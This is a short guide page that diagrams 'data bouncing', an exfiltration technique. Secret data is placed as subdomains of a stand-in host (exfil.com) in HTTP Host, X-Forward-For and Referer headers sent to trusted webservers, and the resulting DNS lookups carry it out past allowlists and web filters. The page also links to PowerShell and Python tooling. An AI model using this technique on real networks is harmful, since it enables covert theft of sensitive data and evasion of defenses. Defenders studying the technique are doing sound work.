Web Headers (HLD)

  • @site.url: https://databouncing.io
  • path: /webheadershld/
  • excerpt: Mermaid Diagram Journey of Databouncing with HTTP Web Headers via trusted web servers and ultimately handed over to the exfil DNS
  • published date:
  • reading time: 1 minute
  • tag: Guides
  • authors: JC

This Mermaid Diagram gives you a visualization of the journey of carefully positioned exfildata on it's way to an informed listener, the headers are examples but we've found Host headers being the most popular, others work, and you should find them, but these are the top few.

Exfil SystemTrusted WebserversDNS Server - Exfil CollectHTTP Requests to high-integrity domainsHeaders: Host: secretmessage1.exfil.comHeaders: X-Forward-For: secretmessage2.exfil.comHeaders: Referer: secretmessage3.exfil.comIncoming HTTP requests delivered to trusted webserver, containing sensitive exfiltrated data in headersHeaders: Host: secretmessage1.exfil.comHeaders: X-Forward-For: secretmessage2.exfil.comHeaders: Referer: secretmessage3.exfil.comHTTP ResponseConfirms receipt of HTTP request with sensitive data in the headersLookup secretmessage1.exfil.comExfiltration Data Received (Hostname: secretmessage1.exfil.com)IP for secretmessage1.exfil.comReceived IP address corresponding to secretmessage1.exfil.comLookup secretmessage2.exfil.comExfiltration Data Received (Hostname: secretmessage2.exfil.com)IP for secretmessage2.exfil.comReceived IP address corresponding to secretmessage2.exfil.comLookup secretmessage3.exfil.comExfiltration Data Received (Hostname: secretmessage3.exfil.com)IP for secretmessage3.exfil.comReceived IP address corresponding to secretmessage3.exfil.comalt[Hostname Lookup Solicitation]DNS Resolution CompleteWeb server returns the final HTTP response to the client, confirming successful hostname lookupsExfil SystemTrusted WebserversDNS Server - Exfil Collect

So, If you imagine the high integrity domains being something like Microsoft, or your defense provider, or analytics, or even just an associated domain that's been seen in your DNS TXT records, or is a known service provider to your organization, this is more than enough for most web filtering systems, and allowlists.

More on this topic

Surgeon Script

  • date published:
  • reading-time: 3 min read
  • authors:
Working with specific parameters within web requests to Databounce

Data Bouncing With Jakoby

  • date published:
  • reading-time: 2 min read
  • authors:
Data Bouncing - PowerShell Version via Jakoby (Unit-259) - this version uses Hex in the hostname and defaults to a public interactsh (so you dont need your own DNS listener)

Identifying Candidates

  • date published:
  • reading-time: 2 min read
  • authors:
Example One is a glimpse into what is needed to identify DataBouncing Candidates Recruiter - Send stuff Interactsh - Listen for stuff Target List - Stuff to be sent

Bouncing with Nick Dunn

  • date published:
  • reading-time: 2 min read
  • authors:
When we where conceptualizing data bouncing, Nick rolled his sleeves top and put together the first set of reliable python tools to get data out and rebuilt via databouncing, this is achieved over four scripts - https://github.com/N1ckDunn/DataBouncing/tree/main